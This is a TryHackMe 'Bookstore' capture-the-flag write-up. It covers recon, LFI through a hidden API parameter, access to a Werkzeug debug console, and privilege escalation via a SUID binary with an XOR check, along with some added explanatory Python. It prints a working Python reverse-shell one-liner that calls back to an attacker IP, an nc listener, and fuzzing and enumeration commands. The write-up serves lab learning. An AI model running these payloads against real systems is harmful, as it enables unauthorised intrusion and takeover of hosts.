Hello. I’m Rahmos. Here is my Bookstore — TryHackMe — WriteUp. Check it out!
First, deploy the machine and run nmap to find open ports:
nmap -A -T4 -v -p- <ip>
There are 3 open ports: 22 (SSH), 80 (Apache), and 5000 (Werkzeug). Werkzeug is the Python WSGI library that Flask is built on, and its development server ships with an interactive debugger. Let's first access the website on port 80:
I checked the page source (Ctrl+U), but found nothing valuable.
Now let’s access /books:
There's a base32-encoded string. Decode it using https://www.dcode.fr/base-32-encoding:
Then decode the ASCII codes, which reveal a YouTube link:
Open the YouTube link:
Well, it looks like a rabbit hole.
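The two-layer decode above (base32 first, then a run of ASCII code points) is easy to script so you don't depend on a website. The example below is added here and is not from the original write-up: the sample blob, the placeholder link and the assumption that the inner layer is space-separated decimal (or hex) codes are all constructed for the example.

```python
import base64
import re

# Constructed sample for this example (not the string from the room): the hint text is
# written as space-separated decimal ASCII codes, and that text is then base32-encoded.
HINT_TEXT = "https://youtu.be/EXAMPLE"  # placeholder, not the room's real link


def encode_layers(text: str) -> str:
    """Build the two-layer blob the same way it would have been produced."""
    codes = " ".join(str(ord(c)) for c in text)
    return base64.b32encode(codes.encode("ascii")).decode("ascii")


def encode_hex_layers(text: str) -> str:
    """Variant where the inner layer is a contiguous hex string rather than decimals."""
    return base64.b32encode(text.encode("ascii").hex().encode("ascii")).decode("ascii")


SAMPLE = encode_layers(HINT_TEXT)


def decode_layers(blob: str) -> str:
    """Peel base32, then a layer of ASCII code points (decimal or hex) if one is present."""
    raw = blob.strip()
    padded = raw + "=" * (-len(raw) % 8)  # restore '=' padding if it was stripped
    inner = base64.b32decode(padded, casefold=True).decode("ascii", errors="replace")
    tokens = inner.split()
    # Decimal codes such as "104 116 116 112" (checked first; a token like "68" is
    # ambiguous between decimal and hex and is read as decimal here)
    if tokens and all(re.fullmatch(r"\d{1,3}", t) for t in tokens):
        return "".join(chr(int(t)) for t in tokens)
    # Hex codes, spaced ("68 74 74 70") or run together ("68747470")
    if tokens and all(re.fullmatch(r"(?:[0-9a-fA-F]{2})+", t) for t in tokens):
        return "".join(chr(int(t[i:i + 2], 16)) for t in tokens for i in range(0, len(t), 2))
    return inner  # no second layer recognised; hand back the base32 plaintext


if __name__ == "__main__":
    print(SAMPLE)
    print(decode_layers(SAMPLE))
```

Usage: paste the string from /books in place of SAMPLE; if the inner layer is plain text (no code points), the function simply returns the base32 plaintext.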
Next, access /login:
So I need to go after the debugger. Access port 5000:
Use gobuster to find hidden directories on this port:
gobuster dir -u http://<ip>:5000 -w /path-to-wordlist
Well, in order to access /console, I need the PIN. Looking back at the page source of login.html, I learn that the PIN is inside the .bash_history file.
OK, so now I know the API's parameter. I tried LFI through it to read .bash_history, but none of the attempts were successful. I even tried downgrading the API version (v2 to v1), but still no luck:
So I suspect there's another parameter I can use for LFI. I use wfuzz to fuzz for the hidden parameter:
wfuzz -c -f bookstore.txt -u "http://<ip>:5000/api/v1/resources/books?FUZZ=.bash_history" -w /path-to-wordlist -t 100 2>/dev/null --hc 404
OK, I've found the hidden parameter. Let's use it for LFI:
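The root cause behind this step is an API handler that joins a request parameter straight onto a directory path. The example below is added here and is not the room's API or code: BOOKS_DIR, the allowlist pattern and the sample inputs are assumptions made for the example. It shows the vulnerable resolution next to a hardened one, plus the containment check a test or detection rule would use.

```python
import os
import re

# Assumed layout for this example only; not the room's real API or paths.
BOOKS_DIR = "/srv/bookstore/books"
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.txt")


def resolve_unsafe(param_value: str) -> str:
    """The vulnerable pattern: a request parameter is joined straight onto BOOKS_DIR.

    os.path.join discards BOOKS_DIR when param_value is absolute, and '..' components
    walk out of it, so any file readable by the service can be requested (this is LFI).
    """
    return os.path.normpath(os.path.join(BOOKS_DIR, param_value))


def escapes_books_dir(path: str) -> bool:
    """True when a resolved path is not inside BOOKS_DIR (what a test or log rule flags)."""
    return os.path.commonpath([BOOKS_DIR, path]) != BOOKS_DIR


def resolve_safe(param_value: str) -> str:
    """The hardened version: allowlist the name, then confirm containment anyway."""
    if not SAFE_NAME.fullmatch(param_value):
        raise ValueError("book name rejected by allowlist")
    candidate = os.path.normpath(os.path.join(BOOKS_DIR, param_value))
    # Defence in depth; on a live host use os.path.realpath so symlinks are folded too
    if escapes_books_dir(candidate):
        raise ValueError("path escapes the books directory")
    return candidate


if __name__ == "__main__":
    # Constructed inputs: one legitimate request and two traversal attempts
    for value in ("book1.txt", "../../../home/sid/.bash_history", "/etc/passwd"):
        unsafe = resolve_unsafe(value)
        print(f"{value!r}: unsafe -> {unsafe} (escapes={escapes_books_dir(unsafe)})")
        try:
            print(f"{value!r}: safe   -> {resolve_safe(value)}")
        except ValueError as err:
            print(f"{value!r}: safe   -> rejected ({err})")
```

The allowlist is the real fix; the containment check is there so that a future change to the allowlist cannot silently reopen the hole. Note that the first version would also have been caught by downgrading nothing: the API version does not matter when the handler itself trusts the parameter.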
I’ve got the PIN! It’s time for /console:
I'm into the console. I can run Python code here, so let's spawn a reverse shell to my machine. First, start a listener on your machine:
nc -lvnp 4444
Then run this Python code in the web console:
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ip>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")
After that, I have a shell on the machine as sid:
Get the user flag:
Next, I'll find a way to escalate privileges to root. First, try sudo -l to see what sid can run with sudo:
Well, I don't know sid's password, so I cannot use sudo for now. Next, look for SUID binaries using find:
find / -perm -u=s 2>/dev/null
This one looks suspicious. Let's inspect it:
So I need to find the correct number. First, transfer the try-harder binary to your machine using scp:
scp try-harder <user>@<ip>:/home/<user>
Then use Ghidra to decompile the binary:
OK, so if I input the correct number, I get a bash shell as root (the -p flag stops bash from dropping the effective UID, and the binary is SUID root).
Decoding the hex constants gives all the numbers needed:
OK, so here's the formula:
"^" means XOR. So a will be: 1573743953
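The step from the formula to the number relies on one property: XOR is its own inverse, so applying the same constants to the target recovers the input. The example below is added here and is not the write-up's own code; K1, K2 and TARGET are placeholder constants, not the values from try-harder, and the 32-bit mask is an assumption about the comparison width.

```python
# Placeholder constants for this example; the real ones come from the decompiled binary.
K1 = 0x5A5A
K2 = 0x1234
TARGET = 0x7F3C0D21
MASK32 = 0xFFFFFFFF  # assumption: the comparison is on 32-bit unsigned ints


def check(a: int) -> bool:
    """Shape of the guard in the binary: the input XORed with two constants must equal TARGET."""
    return ((a ^ K1 ^ K2) & MASK32) == TARGET


def solve(target: int, keys: tuple) -> int:
    """General inversion: x ^ k ^ k == x and XOR is commutative, so XORing the target
    with every constant (in any order) yields the input the check wants."""
    a = target
    for k in keys:
        a ^= k
    return a & MASK32


def solve_try_harder_shape() -> int:
    """Apply the inversion to the two-constant form used above: a = TARGET ^ K1 ^ K2."""
    return solve(TARGET, (K1, K2))


if __name__ == "__main__":
    a = solve_try_harder_shape()
    print(f"input = {a} (0x{a:08X}), passes check: {check(a)}")
```

Swap in the constants from your own decompilation and the printed value is the number to enter; the forward check confirms it before you type it.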
Input this number and I get the root shell! Read the root flag: